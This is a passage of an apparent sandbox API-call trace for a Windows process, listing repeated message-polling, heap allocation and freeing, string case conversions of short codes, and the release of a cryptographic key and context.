wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.229] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0208.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.229] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.230] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0208.230] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0208.230] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.230] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0208.231] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0208.231] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.231] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.231] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.231] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.231] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.231] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.232] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0208.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.232] CryptDestroyKey (hKey=0xaa57e0) returned 1 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.232] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0208.233] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.233] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.233] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.233] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.234] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.234] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.234] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0208.234] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.234] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.234] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.234] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.234] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0208.235] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0208.235] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.235] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.235] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.236] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.236] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.236] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.236] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.236] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0208.236] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.237] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.237] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0208.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0208.238] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0208.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0208.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0208.238] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0208.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.238] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.238] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0208.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.238] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0208.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0208.239] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.239] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.239] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.239] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.239] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.239] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.239] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.239] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.239] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.239] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.239] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.240] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0208.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.240] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0208.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.240] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.240] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0208.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.242] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.242] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0208.243] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.243] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0208.243] HeapFree (in: hHeap=0x25c0000, 